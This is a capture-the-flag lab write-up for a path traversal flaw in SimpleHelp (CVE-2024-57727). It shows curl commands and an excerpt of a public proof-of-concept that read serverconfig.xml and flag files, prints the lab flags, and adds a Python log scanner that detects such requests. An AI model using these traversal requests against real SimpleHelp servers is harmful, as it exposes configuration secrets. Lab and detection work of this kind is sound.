Try Hack Me/SimpleHelp
Write-up / THM / SimpleHelp: CVE-2024-57727
by: alfreddgreat
Get the Python proof-of-concept (PoC) script for the vulnerability from https://github.com/imjdl/CVE-2024-57727.
root@ip-10-10-65-98:~# git clone https://github.com/imjdl/CVE-2024-57727
Change into the cloned CVE-2024-57727 directory.
root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/
Run the Python script:
root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py http://10.10.32.37
Check the poc.py script:
def send_path_traversal_request(url: str) -> bool:
    """
    Send a path traversal request and get the response

    Args:
        url (str): Target url address

    Returns:
        dict: Dictionary containing response information, including status code, response content, etc.
        None: Returns None if request fails
    """
    url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"
    context = ssl._create_unverified_context()
    # Default request headers
    default_headers = {
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept': '*/*',
        'Connection': 'keep-alive'
    }
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt
THM{9ND23PVA}
"Choose your path wisely, but your shoes comfortably."
"Traverse lightly, laugh loudly."
THM{9ND23PVA}
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt
THM{X8733EEZ}
"Some paths are meant to be traversed; others just lead to a 404."
THM{X8733EEZ}
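The requests above all start under /toolbox-resource/ and use ../ segments to climb out of that directory. As an added example (not part of the original write-up or the linked PoC), the following Python script flags that pattern in web access logs; the combined-style log format (for instance from a reverse proxy in front of SimpleHelp) and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined-log style (assumed format, not SimpleHelp's own log).
SAMPLE_LOG = """\
10.10.65.98 - - [01/Feb/2025:10:00:01 +0000] "GET /toolbox-resource/../resource1/../../configuration/serverconfig.xml HTTP/1.1" 200 4312
10.10.65.98 - - [01/Feb/2025:10:00:09 +0000] "GET /toolbox-resource/../secmsg/../../configuration/flag.txt HTTP/1.1" 200 98
10.10.65.77 - - [01/Feb/2025:10:01:30 +0000] "GET /toolbox-resource/%2e%2e/resource1/%2e%2e/%2e%2e/configuration/serverconfig.xml HTTP/1.1" 404 0
10.10.65.12 - - [01/Feb/2025:10:02:00 +0000] "GET /toolbox-resource/icons/../icons/logo.png HTTP/1.1" 200 2048
10.10.65.12 - - [01/Feb/2025:10:02:05 +0000] "GET /allversions HTTP/1.1" 200 120
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
PREFIX = "/toolbox-resource/"

def escapes_prefix(raw_target: str) -> bool:
    """True if a /toolbox-resource/ request uses dot segments to leave that prefix."""
    path = urlsplit(raw_target).path
    # Decode twice to catch single and double percent-encoding of dots and slashes.
    decoded = unquote(unquote(path)).replace("\\", "/")
    if not decoded.startswith(PREFIX):
        return False
    depth = 0  # directory depth below the prefix
    for seg in decoded[len(PREFIX):].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:  # climbed above /toolbox-resource/
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def scan(log_text: str) -> list[tuple[str, str, int]]:
    """Return (client, raw request target, status) for each traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and escapes_prefix(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits

if __name__ == "__main__":
    for client, target, status in scan(SAMPLE_LOG):
        # A 200 means the file was served, so treat its contents as disclosed.
        print(f"{'SERVED' if status == 200 else 'blocked'} {client} {target}")
```

A hit with status 200 on serverconfig.xml means the configuration file should be treated as disclosed. The check only works on logs that record the raw request target, since a proxy that normalizes paths before logging hides the ../ segments.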